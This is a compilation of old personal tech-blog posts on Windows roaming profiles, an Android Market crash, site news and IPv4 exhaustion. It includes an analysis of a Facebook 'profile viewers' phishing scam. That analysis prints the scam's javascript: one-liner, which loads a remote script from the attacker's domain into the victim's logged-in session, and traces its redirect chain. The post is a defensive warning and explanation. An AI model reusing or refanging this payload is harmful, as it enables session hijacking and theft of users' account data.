Roaming Profiles: From Windows XP to Vista / Windows 7


Quick, short post today, but this will probably save you a lot of time searching for a pretty much non-existent answer to a new “feature” introduced in roaming profiles for Windows Vista and Windows 7. It cost me an hour to figure this out. Hopefully you’ll see this and solve the issue in a jiffy…

SCENARIO:
You join your brand new Vista or Win7 machines to a your domain and then try logging in with a roaming user account and get a popup notification error saying that Windows has logged you in with a temporary profile. You look in the event viewer and see the following:

All the permissions are set correctly for the share and folders for the roaming profile and the user can create files in the roaming profile folder, but the stupid “Access Denied” error message is still there.

SOLUTION:
Your roaming profile path MUST have a trailing slash at the end now… Likewise:

What the hell, Microsoft? All along you’re lax (*nix had this enforced all along) and now you change it. At least let us know? Please and thank you…

On a slightly different note, I also suggest that you set the following Group Policies to make your sysadmin life easier:
Computer Config\Policies\Administrative Templates\System\Logon --> Always wait for network at computer startup and logon [Enabled]
Computer Config\Policies\Administrative Templates\System\User Profiles --> Add the Administrators security group to the roaming user profile share [Enabled]
Computer Config\Policies\Administrative Templates\System\User Profiles --> Wait for remote user profile --> [Enabled]

As usual, cheers.

Facebook Security: An Old Phishing Trick, Revived & Analyzed.


In the past, you may remember that I’ve written about many instances where Facebook users were falling for a trick where a link get’s posted on their wall asking them to click a fake link in order to gain access so some “cool” feature such as getting a free iPad, gaining access and see other people’s hidden profile information, or get free male enhancements. They all work on the same principle: a user clicks on a link that takes them to a Facebook page, which instructs them to paste a line JavaScript code into their URL bar and press enter. In turn, this tells the user’s browser to run code that can do pretty much whatever it wants to do with your Facebook session or anything else you might have open, for that matter.

For all you non-tech users out there: DON’T EVER, paste or click any link without first checking out what it may do. And as always, if it sounds too good to be true, IT PROBABLY IS!

In the rest of this post, I’ll analyze in detail, one particular phishing scheme that happened to explode all over Facebook in the last 24-ish hours. Keep in mind, most of the phishing right now is based on this. The rest of the Facebook phishing is done by sending you a fake e-mail with a link to a fake Facebook login page, which then steals your e-mail address and password.

The scam starts with a sent to you, either by e-mail, and/or posted on your wall. It looks something like this:

 

The link posted takes you to a facebook page that looks like this:

 

In this particular Facebook page, it redirects you to a 3rd party domain (kkpj.info), which takes you back to another Facebook page that looks exactly like the previous. This is done to retain a Facebook page that they can use to redirect to additional, different Facebook pages, should it be reported. In other words, if the malicious page gets reported, it would be the second one, allowing the original page to be retained and modified. I found this one because NoScript (Firefox Plugin) blocks scripts by default:

 

This second Facebook page looks like this:

 

And this one is the one that instructs you to copy and paste some code to run in your browser’s URL bar. Very bad idea for the end user. Let’s take a closer look at the code itself (this one has been de-fanged – refang at your own risk):

javascript: /* FACEBOOK PROFILE VIEWERS */ (a=(b=document).createElement(script)).src=//g2ds.info/d.php?split=1rand=329154403,b.body.appendChild(a) void(0) /* FACEBOOK PROFILE VIEWERS */

This basically tells the browser to execute whatever scripts lie at g2ds.info/d.php with a few parameters from your current Facebook session, most prominently your friends list, but can also include your profile information (e-mail address, residence, phone numbers), or even your Facebook credentials. This kind of attack falls under the category of “User Induced Cross Site Scripting (XSS)”.

A few other interesting notes:

    kkpj.info’s index page simply redirects the user to the second Facebook page, via a JavaScript.
    Both kkpj.info and g2ds.info have the same IP address (50.22.91.42), are registered from eNom, Inc, and are hosted by hostgator.com, as evidenced by their nameservers, NS2767.HOSTGATOR.COM, and NS2768.HOSTGATOR.COM. Private registration of these 2 domains prevent identifying details from being revealed.
    g2ds.info is the actual domain where the malicious scripts are run from.

 

Android Market 2.3 Force Close / Crash


I was stumped by this issue for a long time and was only recently able to find the solution using the Android SDK’s “adb logcat” function to reveal the system logs.

Essentially, you try to install or update an app from the Android market, and it crashes with a force close message. Reading around on the forums over at xda-developers.com and other places suggest the following:

Proposed Solution #1
Settings -> Applications -> Manage Applications -> All -> Market :: Hit “Uninstall” to uninstall updates, essentially roll back the version to the one that came with your ROM.

Proposed Solution #2
Settings -> Applications -> Manage Applications -> All -> Market :: Hit “Clear Data” and “Clear Cache”

Proposed Solution #3 (mailny for cyanogenmod or ROMs that don’t come with the Google apps installed)
Boot into recovery and reinstall the gapps zip file.

Proposed Solution #4
Search for the Market app’s apk file and install it using “adb install -r appname.apk”. Make sure you have Settings -> Applications -> Install from Unknown Sources enabled.

Proposed Solution #5
Wipe all data / factory reset. Obviously #sadface. Or #angryface.

I tried all of the suggested solutions above, except the full reset. Obviously should be something that doesn’t require that drastic of a change… but none of the other solutions worked. So I turned on usb debugging, ran “adb logcat”, and then reproduced the market force close / crash. Deep in the hundreds of lines of code, I found this:

E/AndroidRuntime( 2975): FATAL EXCEPTION: Download Service
E/AndroidRuntime( 2975): java.lang.SecurityException: Requires VIBRATE permission

What the hell? Yes, I thought the same thing… Why does the market place require vibrate permissions? For notifications maybe… but even more interesting is the fact that the vibrate permissions are required for com.android.media (the music player), which force closes before the market app.

The solution? I had a profile that turned vibrations off for the default “Media” apps group (be default it only has the Music app in it). Switching it to “No override” fixed the crashing / force close issue in a jiffy.

What’s up with this funky fix? And why does the Android Market need to call the Music app with vibrate permissions? Beats me… too bad Google’s apps are closed source.

EDIT: Known affected Market versions (by me), as of writing: 2.3.2, 2.3.3, 2.3.4.

Updates!!! March 23, 2011


Long time no see?

Just wanted to write this post to keep you guys updated on a few behind the scenes things…

1.) New domain :: dmach.net. Everything that was available from darwin-mach.net is now on dmach.net, which should be regarded as the primary domain for all transactions. It’s shorter and much cleaner to use. In other words, please update your bookmarks, RSS feeds, etc.

2.) Mach Technologies :: The entire MTI website has been redesigned, including the client area. Give it a spin: http://www.machtechcorp.net.

3.) “Bye Maemo, Hello Android!” :: I recently got an Android phone. Feel free to ask me Android questions – as a matter of fact, the next post is an Android tip.

I’ve also heard requests for video tutorials on some tech stuff? Let me know in the comments below…

IPv4 Addresses Run Dry: Let the mayhem begin!


The last 5 blocks of the IPv4 addresses were given away this morning to Regional Internet Registries so they can assign them. But once they run out, which would be very soon, it’s game over for IPv4 operations, since no new hosts would be able to connect publicly. IPv6 adoption? So small that most consumer products out there still don’t support it. Also because almost all ISPs out there don’t provide it, or if they do, it’s just beginning as a “trial”.

Source: http://arstechnica.com/tech-policy/news/2011/02/river-of-ipv4-addresses-officially-runs-dry.ars